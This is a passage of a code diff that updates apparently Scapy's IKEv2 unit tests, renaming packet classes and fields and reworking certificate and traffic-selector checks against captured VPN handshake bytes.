2) -transform_3 = IKEv2_payload_Transform(next_payload = 'Transform', transform_type = 'Integrity', transform_id = 2) -transform_4 = IKEv2_payload_Transform(next_payload = 'last', transform_type = 'GroupDesc', transform_id = 2) +transform_1 = IKEv2_Transform(next_payload = 'Transform', transform_type = 'Encryption', transform_id = 12, length = 12, key_length = 0x80) +transform_2 = IKEv2_Transform(next_payload = 'Transform', transform_type = 'PRF', transform_id = 2) +transform_3 = IKEv2_Transform(next_payload = 'Transform', transform_type = 'Integrity', transform_id = 2) +transform_4 = IKEv2_Transform(next_payload = 'None', transform_type = 'GroupDesc', transform_id = 2) packet = IP(dst = '192.168.1.10', src = '192.168.1.130') /\ UDP(dport = 500) /\ IKEv2(init_SPI = b'KWdxMhjA', next_payload = 'SA', exch_type = 'IKE_SA_INIT', flags='Initiator') /\ - IKEv2_payload_SA(next_payload = 'KE', prop = IKEv2_payload_Proposal(trans_nb = 4, trans = transform_1 / transform_2 / transform_3 / transform_4, )) /\ - IKEv2_payload_KE(next_payload = 'Nonce', group = '1024MODPgr', load = key_exchange) /\ - IKEv2_payload_Nonce(next_payload = 'Notify', load = nonce) /\ - IKEv2_payload_Notify(next_payload = 'Notify', type = 16388, load = nat_detection_source_ip) /\ - IKEv2_payload_Notify(next_payload = 'None', type = 16389, load = nat_detection_destination_ip) + IKEv2_SA(next_payload = 'KE', prop = IKEv2_Proposal(trans_nb = 4, trans = transform_1 / transform_2 / transform_3 / transform_4, )) /\ + IKEv2_KE(next_payload = 'Nonce', group = '1024MODPgr', ke = key_exchange) /\ + IKEv2_Nonce(next_payload = 'Notify', nonce = nonce) /\ + IKEv2_Notify(next_payload = 'Notify', type = 16388, notify = nat_detection_source_ip) /\ + IKEv2_Notify(next_payload = 'None', type = 16389, notify = nat_detection_destination_ip) assert raw(packet) == b'E\x00\x01L\x00\x01\x00\x00@\x11\xf5\xc3\xc0\xa8\x01\x82\xc0\xa8\x01\n\x01\xf4\x01\xf4\x018\xa6\xc0KWdxMhjA\x00\x00\x00\x00\x00\x00\x00\x00! "\x08\x00\x00\x00\x00\x00\x00\x010"\x00\x000\x00\x00\x00,\x01\x01\x00\x04\x03\x00\x00\x0c\x01\x00\x00\x0c\x80\x0e\x00\x80\x03\x00\x00\x08\x02\x00\x00\x02\x03\x00\x00\x08\x03\x00\x00\x02\x00\x00\x00\x08\x04\x00\x00\x02(\x00\x00\x88\x00\x02\x00\x00\xbbA\xbbA\xcf\xaf4\xe3\xb3 \x96r\xae\xf1\xc5\x1b\x9dR\x91\x9f\x17\x81\xd0\xb4\xcd\x88\x9dJ\xaf\xe2ah\x87v\x00\x0c=\x901PZ\xef\xc0\x18ig\xea\xf5\xa7f7%\xfb\x10,Y\xc3\x9bzp\xd8\xd9\x16\x1c;\xd0\xebDX\x88\xb5\x02\x8e\xa0c\xba\n\xe0\x1f[?0\x80\x8akg\x10\xdc\x9b\xab`\x1eA\x16\x15}\x7fX\xcf\x83\\\xb63\xc6J\xbc\xb3\xa5\xc6\x1c">\x932S\x8b\xfc\x9f(,\xb6-\x1f\x00\xf4\xee\x88\x02)\x00\x00$\x8d\xfc\xf88L\\2\xf1\xb2\x94\xc6N\xabi\xf9\x8e\x9d\x8c\xf7\xe7\xf3R\x97\x1a\x91\xffgw\xd4}\xff\xed)\x00\x00\x1c\x00\x00@\x04\xe6L\x81\xc4\x15*\xd8;\xd6\xe05\x00\x9f\xbb\x90\x04\x06\xbe7\x1f\x00\x00\x00\x1c\x00\x00@\x05(\xcd\x99\xb9\xfa\x12geKS\xf6\x08\x87\xc9\xc3[\xcfg\xa8\xff' @@ -60,24 +60,24 @@ assert raw(packet) == b'E\x00\x01L\x00\x01\x00\x00@\x11\xf5\xc3\xc0\xa8\x01\x82\ = Dissect Initiator Request a = Ether(b'\x00!k\x91#H\xb8\'\xeb\xa6XI\x08\x00E\x00\x01\x14u\xc2@\x00@\x11@\xb6\xc0\xa8\x01\x02\xc0\xa8\x01\x0e\x01\xf4\x01\xf4\x01\x00=8\xeahM!Yz\xfd6\x00\x00\x00\x00\x00\x00\x00\x00! "\x08\x00\x00\x00\x00\x00\x00\x00\xf8"\x00\x00(\x00\x00\x00$\x01\x01\x00\x03\x03\x00\x00\x0c\x01\x00\x00\x0f\x80\x0e\x00\x80\x03\x00\x00\x08\x02\x00\x00\x05\x00\x00\x00\x08\x04\x00\x00\x13(\x00\x00H\x00\x13\x00\x002\xc6\xdf\xfe\\C\xb0\xd5\x81\x1f~\xaa\xa8L\x9fx\xbf\x99\xb9\x06\x9c+\x07.\x0b\x82\xf4k\xf6\xf6m\xd4_\x97\xef\x89\xee(_\xd5\xdfRzDwkR\x9f\xc9\xd8\xa9\t\xd8B\xa6\xfbY\xb9j\tS\x95ar)\x00\x00$\xb6UF-oKf\xf8r\xcc\xd7\xf0\xf4\xb4\x85w2\x92\x139\xcb\xaaR7\xed\xba$O&+h#)\x00\x00\x1c\x00\x00@\x04\x94\x9c\x9d\xb5s\x9du\xa9t\xa4\x9c\x18F\x186\x9b4\xb7\xf9B)\x00\x00\x1c\x00\x00@\x05>r\x1bF\xbe\x07\xd51\x11B]\x7f\x80\xd2\xc6\xe2 \xc6\x07.\x00\x00\x00\x10\x00\x00@/\x00\x01\x00\x02\x00\x03\x00\x04') -assert a[IKEv2_payload_SA].prop.trans.transform_id == 15 -assert a[IKEv2_payload_Notify].next_payload == 41 -assert IP(a[IKEv2_payload_Notify].load).src == "70.24.54.155" -assert IP(a[IKEv2_payload_Notify].payload.load).dst == "32.198.7.46" +assert a[IKEv2_SA].prop.trans.transform_id == 15 +assert a[IKEv2_Notify].next_payload == 41 +assert IP(a[IKEv2_Notify].notify).src == "70.24.54.155" +assert IP(a[IKEv2_Notify].payload.notify).dst == "32.198.7.46" = Dissect Responder Response b = Ether(b'\xb8\'\xeb\xa6XI\x00!k\x91#H\x08\x00E\x00\x01\x0c\xd2R@\x00@\x11\xe4-\xc0\xa8\x01\x0e\xc0\xa8\x01\x02\x01\xf4\x01\xf4\x00\xf8\x07\xdd\xeahM!Yz\xfd6\xd9\xfe*\xb2-\xac#\xac! " \x00\x00\x00\x00\x00\x00\x00\xf0"\x00\x00(\x00\x00\x00$\x01\x01\x00\x03\x03\x00\x00\x0c\x01\x00\x00\x0f\x80\x0e\x00\x80\x03\x00\x00\x08\x02\x00\x00\x05\x00\x00\x00\x08\x04\x00\x00\x13(\x00\x00H\x00\x13\x00\x00,f\xbe\xad\xb6\xce\x855\xd6!\x8c\xb4\x01\xaaZ\x1e\xb4\x03[\x97\xca\xdd\xaf67J\x97\x9c\x04F\xb8\x80\x05\x06\xbf\x9do\x95\tR2k\xf3\x01\x19\x13\xda\x93\xbb\x8e@\xf8\x157k\xe1\xa0h\x01\xc0\xa6>;T)\x00\x00$\x9e]&sy\xe6\x81\xe7\xd3\x8d\x81\xc7\x10\xd3\x83@\x1d\xe7\xe3`{\x92m\x90\xa9\x95\x8a\xdc\xb5(1\xaa)\x00\x00\x1c\x00\x00@\x04z\x07\x85\'=Y 8)\xa6\x97U\x0f1\xcb\xb9N\xb7+C)\x00\x00\x1c\x00\x00@\x05\xc3\xe5\x8a\x8c\xc9\x93<\xe0\xb7\x8f*P\xe8\xde\x80\x13N\x12\xce1\x00\x00\x00\x08\x00\x00@\x14') assert b[UDP].dport == 500 -assert b[IKEv2_payload_KE].load == b',f\xbe\xad\xb6\xce\x855\xd6!\x8c\xb4\x01\xaaZ\x1e\xb4\x03[\x97\xca\xdd\xaf67J\x97\x9c\x04F\xb8\x80\x05\x06\xbf\x9do\x95\tR2k\xf3\x01\x19\x13\xda\x93\xbb\x8e@\xf8\x157k\xe1\xa0h\x01\xc0\xa6>;T' -assert b[IKEv2_payload_Nonce].payload.type == 16388 -assert b[IKEv2_payload_Nonce].payload.payload.payload.next_payload == 0 +assert b[IKEv2_KE].ke == b',f\xbe\xad\xb6\xce\x855\xd6!\x8c\xb4\x01\xaaZ\x1e\xb4\x03[\x97\xca\xdd\xaf67J\x97\x9c\x04F\xb8\x80\x05\x06\xbf\x9do\x95\tR2k\xf3\x01\x19\x13\xda\x93\xbb\x8e@\xf8\x157k\xe1\xa0h\x01\xc0\xa6>;T' +assert b[IKEv2_Nonce].payload.type == 16388 +assert b[IKEv2_Nonce].payload.payload.payload.next_payload == 0 = Dissect Encrypted Initiator Request a = Ether(b"\x00!k\x91#H\xb8'\xeb\xa6XI\x08\x00E\x00\x00Yu\xe2@\x00@\x11AQ\xc0\xa8\x01\x02\xc0\xa8\x01\x0e\x01\xf4\x01\xf4\x00E}\xe0\xeahM!Yz\xfd6\xd9\xfe*\xb2-\xac#\xac. %\x08\x00\x00\x00\x02\x00\x00\x00=*\x00\x00!\xcc\xa0\xb3]\xe5\xab\xc5\x1c\x99\x87\xcb\xf1\xf5\xec\xff!\x0e\xb7g\xcd\xb8Qy8;\x96Mx\xe2") -assert a[IKEv2_payload_Encrypted].next_payload == 42 -assert a[IKEv2_payload_Encrypted].load == b'\xcc\xa0\xb3]\xe5\xab\xc5\x1c\x99\x87\xcb\xf1\xf5\xec\xff!\x0e\xb7g\xcd\xb8Qy8;\x96Mx\xe2' +assert a[IKEv2_Encrypted].next_payload == 42 +assert a[IKEv2_Encrypted].load == b'\xcc\xa0\xb3]\xe5\xab\xc5\x1c\x99\x87\xcb\xf1\xf5\xec\xff!\x0e\xb7g\xcd\xb8Qy8;\x96Mx\xe2' = Dissect Encrypted Responder Response @@ -85,29 +85,27 @@ b = Ether(b"\xb8'\xeb\xa6XI\x00!k\x91#H\x08\x00E\x00\x00Q\xd5y@\x00@\x11\xe1\xc1 assert b[IKEv2].init_SPI == b'\xeahM!Yz\xfd6' assert b[IKEv2].resp_SPI == b'\xd9\xfe*\xb2-\xac#\xac' assert b[IKEv2].next_payload == 46 -assert b[IKEv2_payload_Encrypted].load == b'\xa8\x0c\x95{\xac\x15\xc3\xf8\xaf\xdf1Z\x81\xccK|@\xe8f\rD' +assert b[IKEv2_Encrypted].load == b'\xa8\x0c\x95{\xac\x15\xc3\xf8\xaf\xdf1Z\x81\xccK|@\xe8f\rD' = Test Certs detection -a = IKEv2_payload_CERT(raw(IKEv2_payload_CERT_CRL())) -b = IKEv2_payload_CERT(raw(IKEv2_payload_CERT_STR())) -c = IKEv2_payload_CERT(raw(IKEv2_payload_CERT_CRT())) +a = IKEv2_CERT(raw(IKEv2_CERT(cert_encoding = "X.509 Certificate - Signature"))) +b = IKEv2_CERT(raw(IKEv2_CERT(cert_encoding ="Certificate Revocation List (CRL)"))) +c = IKEv2_CERT(raw(IKEv2_CERT(cert_encoding = 0))) + +assert a.cert_encoding == 4 +assert isinstance(a.cert_data, X509_Cert) +assert b.cert_encoding == 7 +assert isinstance(b.cert_data, X509_CRL) +assert c.cert_encoding == 0 +assert isinstance(c.cert_data, bytes) -assert isinstance(a, IKEv2_payload_CERT_CRL) -assert isinstance(b, IKEv2_payload_CERT_STR) -assert isinstance(c, IKEv2_payload_CERT_CRT) = Test Certs length calculations ## For the length calculations see Figure 12 in RFC 7296 -a = IKEv2_payload_CERT_CRT(raw(IKEv2_payload_CERT_CRT())) -assert len(a.x509Cert) > 0 -assert a.length == len(a.x509Cert) + 5 - -b = IKEv2_payload_CERT_CRL(raw(IKEv2_payload_CERT_CRL())) -assert len(b.x509CRL) > 0 -assert b.length == len(b.x509CRL) + 5 -c = IKEv2_payload_CERT_STR(raw(IKEv2_payload_CERT_STR(cert_data=b'dummy'))) +assert a.length == len(a.cert_data) + 5 +assert b.length == len(b.cert_data) + 5 assert c.length == len(c.cert_data) + 5 = Test TrafficSelector detection @@ -122,30 +120,30 @@ assert isinstance(c, EncryptedTrafficSelector) = Test TSi with multiple TrafficSelector dissection -a = IKEv2_payload_TSi() +a = IKEv2_TSi() a.traffic_selector.extend(IPv4TrafficSelector() * 2) a.traffic_selector.extend(IPv6TrafficSelector() * 3) assert len(a.traffic_selector) == 5 -b = IKEv2_payload_TSi(raw(a)) +b = IKEv2_TSi(raw(a)) assert len(b.traffic_selector) == 5 = Test automatic calculation of number_of_TSs field -a = IKEv2_payload_TSi(traffic_selector=IPv4TrafficSelector() * 2) -b = IKEv2_payload_TSi(raw(a)) +a = IKEv2_TSi(traffic_selector=IPv4TrafficSelector() * 2) +b = IKEv2_TSi(raw(a)) assert b.number_of_TSs == 2 -c = IKEv2_payload_TSr(traffic_selector=IPv4TrafficSelector() * 2) -d = IKEv2_payload_TSr(raw(c)) +c = IKEv2_TSr(traffic_selector=IPv4TrafficSelector() * 2) +d = IKEv2_TSr(raw(c)) assert d.number_of_TSs == 2 -= IKEv2_payload_Encrypted_Fragment, simple tests += IKEv2_Encrypted_Fragment, simple tests s = b"\x00\x00\x00\x08\x00\x01\x00\x01" -assert raw(IKEv2_payload_Encrypted_Fragment()) == s +assert raw(IKEv2_Encrypted_Fragment()) == s -p = IKEv2_payload_Encrypted_Fragment(s) +p = IKEv2_Encrypted_Fragment(s) assert p.length == 8 and p.frag_number == 1 @@ -376,40 +374,40 @@ frames = [ id=0, length=300 ) / - IKEv2_payload_SA( + IKEv2_SA( next_payload='KE', - res=0, + flags='', length=40, - prop=IKEv2_payload_Proposal( - next_payload='last', - res=0, + prop=IKEv2_Proposal( + next_payload='None', + flags='', length=36, proposal=1, - proto='IKEv2', + proto='IKE', SPIsize=0, trans_nb=3, SPI='', trans=( - IKEv2_payload_Transform( + IKEv2_Transform( next_payload='Transform', - res=0, + flags='', length=12, transform_type='Encryption', res2=0, transform_id='AES-GCM-16ICV', key_length=256 ) / - IKEv2_payload_Transform( + IKEv2_Transform( next_payload='Transform', - res=0, + flags='', length=8, transform_type='PRF', res2=0, transform_id='PRF_HMAC_SHA2_256' ) / - IKEv2_payload_Transform( - next_payload='last', - res=0, + IKEv2_Transform( + next_payload='None', + flags='', length=8, transform_type='GroupDesc', res2=0, @@ -418,73 +416,73 @@ frames = [ ) ) ) / - IKEv2_payload_KE( + IKEv2_KE( next_payload='Nonce', - res=0, + flags='', length=72, group='256randECPgr', res2=0, - load=b'\xdb%1xD\x0c\xe7v\xa7\x94\x13<\xb8\xb6\x9e^\xb0ts56W\x0cd\xd7\xb60T\x9c\x89\x9c\x07\x12\xd8(\xb3qhP\x08\x85\xe0Q\x02Ex\xaf\xc7\\\x10\x1fs\xb8\x94<\xadb\xd7J0\xf2\xbe\x1f\xca' + ke=b'\xdb%1xD\x0c\xe7v\xa7\x94\x13<\xb8\xb6\x9e^\xb0ts56W\x0cd\xd7\xb60T\x9c\x89\x9c\x07\x12\xd8(\xb3qhP\x08\x85\xe0Q\x02Ex\xaf\xc7\\\x10\x1fs\xb8\x94<\xadb\xd7J0\xf2\xbe\x1f\xca' ) / - IKEv2_payload_Nonce( + IKEv2_Nonce( next_payload='VendorID', - res=0, + flags='', length=44, - load=b'\t\xcbS\x8b,=\xbdM\x0b\xb0\xee\xc8\xd3\x18\xcb\x80\x1a\x9bG\x15\xb2\x07\x82\x8d\x9b_\xf1\xf4\xecd\xedX\x867\x07\xbc\xf1L\xcf\x05' + nonce=b'\t\xcbS\x8b,=\xbdM\x0b\xb0\xee\xc8\xd3\x18\xcb\x80\x1a\x9bG\x15\xb2\x07\x82\x8d\x9b_\xf1\xf4\xecd\xedX\x867\x07\xbc\xf1L\xcf\x05' ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='VendorID', - res=0, + flags='', length=20, vendorID=b'\xebL\x1bx\x8a\xfdJ\x9c\xb7s\nh\xd5lS!' ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='VendorID', - res=0, + flags='', length=20, vendorID=b'\xc6\x1b\xac\xa1\xf1\xa6\x0c\xc1\x08\x00\x00\x00\x00\x00\x00\x00' ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='VendorID', - res=0, + flags='', length=24, vendorID=b'@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\xc0\x00\x00\x00' ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='Notify', - res=0, + flags='', length=20, vendorID=b'@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3' ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload='Notify', - res=0, + flags='', length=8, proto='Reserved', SPIsize=0, type='IKEV2_FRAGMENTATION_SUPPORTED', SPI=b'', - load=b'' + notify=b'' ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload='Notify', - res=0, + flags='', length=8, proto='Reserved', SPIsize=0, type='REDIRECT_SUPPORTED', SPI=b'', - load=b'' + notify=b'' ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload='None', - res=0, + flags='', length=16, proto='Reserved', SPIsize=0, type='SIGNATURE_HASH_ALGORITHMS', SPI='', - load=b'\x00\x01\x00\x02\x00\x03\x00\x04' + notify=b'\x00\x01\x00\x02\x00\x03\x00\x04' ) ), ( @@ -522,40 +520,40 @@ frames = [ id=0, length=305 ) / - IKEv2_payload_SA( + IKEv2_SA( next_payload='KE', - res=0, + flags='', length=40, - prop=IKEv2_payload_Proposal( - next_payload='last', - res=0, + prop=IKEv2_Proposal( + next_payload='None', + flags='', length=36, proposal=1, - proto='IKEv2', + proto='IKE', SPIsize=0, trans_nb=3, SPI='', trans=( - IKEv2_payload_Transform( + IKEv2_Transform( next_payload='Transform', - res=0, + flags='', length=12, transform_type='Encryption', res2=0, transform_id='AES-GCM-16ICV', key_length=256 ) / - IKEv2_payload_Transform( + IKEv2_Transform( next_payload='Transform', - res=0, + flags='', length=8, transform_type='PRF', res2=0, transform_id='PRF_HMAC_SHA2_256' ) / - IKEv2_payload_Transform( - next_payload='last', - res=0, + IKEv2_Transform( + next_payload='None', + flags='', length=8, transform_type='GroupDesc', res2=0, @@ -564,74 +562,74 @@ frames = [ ) ) ) / - IKEv2_payload_KE( + IKEv2_KE( next_payload='Nonce', - res=0, + flags='', length=72, group='256randECPgr', res2=0, - load=b'\x1d\x9c\xd5\x97L\x95\x0c\x95\xe0TD\x83\xfb\x1fz\x912\xf5\xfe\x89Y\xc0\x9a\xb3\xa5Lw\x9f\xf2\xbc\xf4R*\x03\r\xc3;\x9d]\xdf\xeb\x99\xe0(\xc0\xe8\xba}\x80\xdf\xdc\xf1+\x15\x16\xdb\xe1\x80\xe6\xae\xc6dB\x8b' + ke=b'\x1d\x9c\xd5\x97L\x95\x0c\x95\xe0TD\x83\xfb\x1fz\x912\xf5\xfe\x89Y\xc0\x9a\xb3\xa5Lw\x9f\xf2\xbc\xf4R*\x03\r\xc3;\x9d]\xdf\xeb\x99\xe0(\xc0\xe8\xba}\x80\xdf\xdc\xf1+\x15\x16\xdb\xe1\x80\xe6\xae\xc6dB\x8b' ) / - IKEv2_payload_Nonce( + IKEv2_Nonce( next_payload='CERTREQ', - res=0, + flags='', length=44, - load=b'\x1d\x10}\xc5\xa7F=\xa7\xd7a\x01A9\xfb8\x1a\xf9\xcd;\x8c\x01\x81\xe6\xcd6\xa8\xae\x10^U\xaa\x7f\xe7\x1f]\xb1\xd3l)\x15' + nonce=b'\x1d\x10}\xc5\xa7F=\xa7\xd7a\x01A9\xfb8\x1a\xf9\xcd;\x8c\x01\x81\xe6\xcd6\xa8\xae\x10^U\xaa\x7f\xe7\x1f]\xb1\xd3l)\x15' ) / - IKEv2_payload_CERTREQ( + IKEv2_CERTREQ( next_payload='VendorID', - res=0, + flags='', length=5, - cert_type='X.509 Certificate - Signature', - cert_data=b'' + cert_encoding='X.509 Certificate - Signature', + cert_authority=b'' ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='VendorID', - res=0, + flags='', length=24, vendorID=b'@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\xc0\x00\x00\x00' ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='VendorID', - res=0, + flags='', length=20, vendorID=b'@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3' ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='VendorID', - res=0, + flags='', length=20, vendorID=b'\xc6\xf5z\xc3\x98\xf4\x93 \x81E\xb7X\x1e\x87\x89\x83' ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='Notify', - res=0, + flags='', length=20, vendorID=b'\x85\x81w\x03\xc6\xe3 \xd2\xaeZM\xd0 V\xc6\xd7' ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload='Notify', - res=0, + flags='', length=8, proto='Reserved', SPIsize=0, type='IKEV2_FRAGMENTATION_SUPPORTED', SPI=b'', - load=b'' + notify=b'' ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload='Notify', - res=0, + flags='', length=16, proto='Reserved', SPIsize=0, type='SIGNATURE_HASH_ALGORITHMS', SPI=b'', - load=b'\x00\x01\x00\x02\x00\x03\x00\x04' + notify=b'\x00\x01\x00\x02\x00\x03\x00\x04' ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload='None', - res=0, + flags='', length=8, proto='Reserved', SPIsize=0, @@ -665,9 +663,9 @@ frames = [ id=1, length=1280 ) / - IKEv2_payload_Encrypted( + IKEv2_Encrypted( next_payload='IDi', - res=0, + flags='', length=1252, load = ike_auth_request_encrypted_payload ) @@ -699,9 +697,9 @@ frames = [ id=1, length=1272 ) / - IKEv2_payload_Encrypted( + IKEv2_Encrypted( next_payload='IDr', - res=0, + flags='', length=1244, load=ike_auth_response_encrypted_payload ) @@ -768,18 +766,18 @@ frames = [ id=1, length=1280 ) / - IKEv2_payload_IDi( + IKEv2_IDi( next_payload='CERT', - res=0, + flags='', length=18, IDtype='Email_addr', res2=0x0, ID='ikev2-cert' ) / - IKEv2_payload_CERT_CRT( - next_payload='Notify', res=0, length=732, - cert_type='X.509 Certificate - Signature', - x509Cert=X509_Cert( + IKEv2_CERT( + next_payload='Notify', flags='', length=732, + cert_encoding='X.509 Certificate - Signature', + cert_data=X509_Cert( tbsCertificate=X509_TBSCertificate( version=ASN1_INTEGER(2), serialNumber=ASN1_INTEGER(0x1000013), @@ -898,44 +896,44 @@ frames = [ ) ) ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload='Notify', - res=0, + flags='', length=8, proto='IKE', SPIsize=0, type='INITIAL_CONTACT', SPI='', - load='' + notify='' ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload='CERTREQ', - res=0, + flags='', length=8, proto='IKE', SPIsize=0, type='HTTP_CERT_LOOKUP_SUPPORTED', SPI='', - load='' + notify='' ) / - IKEv2_payload_CERTREQ( + IKEv2_CERTREQ( next_payload='AUTH', - res=0, + flags='', length=65, - cert_type='X.509 Certificate - Signature', - cert_data=b'\x91\xc1\xdc\x0f*\x8f\x0e;\xd7\xda\x99\x1aC\xa3\x92&5^B)\xbc\xb6*\x0e\x9d\xe9y\xfd\xa8d\xe3\xf0d`\xdc\xaa\xff\x85\x07Y\xf4\x89V#8e!N\x9a\x10\xe67oLY\xb5\xc0/6m' + cert_encoding='X.509 Certificate - Signature', + cert_authority=b'\x91\xc1\xdc\x0f*\x8f\x0e;\xd7\xda\x99\x1aC\xa3\x92&5^B)\xbc\xb6*\x0e\x9d\xe9y\xfd\xa8d\xe3\xf0d`\xdc\xaa\xff\x85\x07Y\xf4\x89V#8e!N\x9a\x10\xe67oLY\xb5\xc0/6m' ) / - IKEv2_payload_AUTH( + IKEv2_AUTH( next_payload='CP', - res=0, + flags='', length=92, auth_type='Digital Signature', res2=0x0, load=b'\x0c0\n\x06\x08*\x86H\xce=\x04\x03\x020E\x02!\x00\xc1Hj\xb5\xb3\xdbL\x8b\x08\xf3\xae\x06\x13 \x10L\x82o\xb0\x80;\xa1\xe6\xe3\rX\xc8\x00\x0b\xacQB\x02 Xe\xeaA\xbc\x99\xe0\xad\xfa(Vw\x0e\xfa\xffS\x0f.\x85P\xda\x1d\x86\xf8PM\xf0\x04\x02_\xb1-' ) / - IKEv2_payload_CP( + IKEv2_CP( next_payload='SA', - res=0, + flags='', length=128, CFGType='CFG_REQUEST', res2=0x0, @@ -969,26 +967,26 @@ frames = [ ConfigurationAttribute(type=28682, length=6, value='debian') ] ) / - IKEv2_payload_SA( + IKEv2_SA( next_payload='TSi', - res=0, + flags='', length=36, - prop=IKEv2_payload_Proposal( - next_payload='last', - res=0, + prop=IKEv2_Proposal( + next_payload='None', + flags='', length=32, proposal=1, proto='ESP', SPIsize=4, trans_nb=2, SPI=b'\xc1\xa9ek', - trans=IKEv2_payload_Transform(res=0, length=12, transform_type='Encryption', res2=0, transform_id='AES-GCM-16ICV', key_length=128) / - IKEv2_payload_Transform(res=0, length=8, transform_type='Extended Sequence Number', res2=0, transform_id='No ESN') + trans=IKEv2_Transform(flags='', length=12, transform_type='Encryption', res2=0, transform_id='AES-GCM-16ICV', key_length=128) / + IKEv2_Transform(flags='', length=8, transform_type='Extended Sequence Number', res2=0, transform_id='No ESN') ) ) / - IKEv2_payload_TSi( + IKEv2_TSi( next_payload='TSr', - res=0, + flags='', length=24, number_of_TSs=1, res2=0x0, @@ -1002,9 +1000,9 @@ frames = [ ending_address_v4='255.255.255.255') ] ) / - IKEv2_payload_TSr( + IKEv2_TSr( next_payload='VendorID', - res=0, + flags='', length=24, number_of_TSs=1, res2=0x0, @@ -1019,37 +1017,37 @@ frames = [ ending_address_v4='192.168.225.255') ] ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='VendorID', - res=0, + flags='', length=20, vendorID=b'\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00' ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='VendorID', - res=0, + flags='', length=20, vendorID=b'\xc6\x1b\xac\xa1\xf1\xa6\x0c\xc2\x08\x00\x00\x00\x00\x00\x00\x00' ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='Notify', - res=0, + flags='', length=28, vendorID=b'NcP\n\t\xb8\xe8<\x80\xb6\x936&\x8e\xc8\xf6\x00\x0c)0\x10\x9e\x00\x00' ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload='Notify', - res=0, + flags='', length=8, proto='Reserved', SPIsize=0, type='MOBIKE_SUPPORTED', SPI='', - load='' + notify='' ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload=None, - res=0, + flags='', length=8, proto='Reserved', SPIsize=0, @@ -1119,20 +1117,20 @@ frames = [ id=1, length=1272 ) / - IKEv2_payload_IDr( + IKEv2_IDr( next_payload='CERT', - res=0, + flags='', length=126, IDtype=9, res2=0x0, ID=b'0t1\x0b0\t\x06\x03U\x04\x06\x13\x02DE1\x1a0\x18\x06\x03U\x04\n\x0c\x11Demo Organization1\x100\x0e\x06\x03U\x04\x0b\x0c\x07Demo OU1\x100\x0e\x06\x03U\x04\x03\x0c\x07Server11%0#\x06\t*\x86H\x86\xf7\r\x01\t\x01\x16\x16server1@demo.ncp-e.com' ) / - IKEv2_payload_CERT_CRT( + IKEv2_CERT( next_payload='AUTH', - res=0, + flags='', length=742, - cert_type='X.509 Certificate - Signature', - x509Cert=X509_Cert( + cert_encoding='X.509 Certificate - Signature', + cert_data=X509_Cert( tbsCertificate=X509_TBSCertificate( version=ASN1_INTEGER(2), serialNumber=ASN1_INTEGER(0x1000016), @@ -1256,17 +1254,17 @@ frames = [ ) ) ) / - IKEv2_payload_AUTH( + IKEv2_AUTH( next_payload='CP', - res=0, + flags='', length=92, auth_type='Digital Signature', res2=0x0, load=b'\x0c0\n\x06\x08*\x86H\xce=\x04\x03\x020E\x02 x\xd6\xa7\xe8\xb3f\xbd\xe8\xf9\xc1/&\x9f+\xf6A\x16\x95\x11\xceb\x1a\x90\x05\x9a\xed\x0f\xeaGS\x8b\x0e\x02!\x00\x8c\xf3\x08\x13\xd15\xaa\xfe\x8eM\xc0\xfd\xf2\xfdYZ\x98g\xf1\xa6\x08=\x1e\x01\xa1I\xc9\x05\xec\xf9\xbf\xe6' ) / - IKEv2_payload_CP( + IKEv2_CP( next_payload='SA', - res=0, + flags='', length=92, CFGType='CFG_REPLY', res2=0x0, @@ -1284,31 +1282,31 @@ frames = [ ConfigurationAttribute(type=28674, length=0) ] ) / - IKEv2_payload_SA( + IKEv2_SA( next_payload='Nonce', - res=0, + flags='', length=36, - prop=IKEv2_payload_Proposal( - res=0, + prop=IKEv2_Proposal( + flags='', length=32, proposal=1, proto='ESP', SPIsize=4, trans_nb=2, SPI=b'\xac\x0f\xaf\x03', - trans=IKEv2_payload_Transform(res=0, length=12, transform_type='Encryption', res2=0, transform_id='AES-GCM-16ICV', key_length=128) / - IKEv2_payload_Transform(res=0, length=8, transform_type='Extended Sequence Number', res2=0, transform_id='No ESN') + trans=IKEv2_Transform(flags='', length=12, transform_type='Encryption', res2=0, transform_id='AES-GCM-16ICV', key_length=128) / + IKEv2_Transform(flags='', length=8, transform_type='Extended Sequence Number', res2=0, transform_id='No ESN') ) ) / - IKEv2_payload_Nonce( + IKEv2_Nonce( next_payload='TSi', - res=0, + flags='', length=44, - load=b'\xcf\x0eyPv]\xb7\xf77\x1d\xbb\xdf\xa1r\x04\x93\xc8<\x1b\xa4\xdc6\x17\xc3\x19*W\xb9(]\x9ac\n\xc7\x16F\x11\xfd\xf4,' + nonce=b'\xcf\x0eyPv]\xb7\xf77\x1d\xbb\xdf\xa1r\x04\x93\xc8<\x1b\xa4\xdc6\x17\xc3\x19*W\xb9(]\x9ac\n\xc7\x16F\x11\xfd\xf4,' ) / - IKEv2_payload_TSi( + IKEv2_TSi( next_payload='TSr', - res=0, + flags='', length=24, number_of_TSs=1, res2=0x0, @@ -1324,9 +1322,9 @@ frames = [ ) ] ) 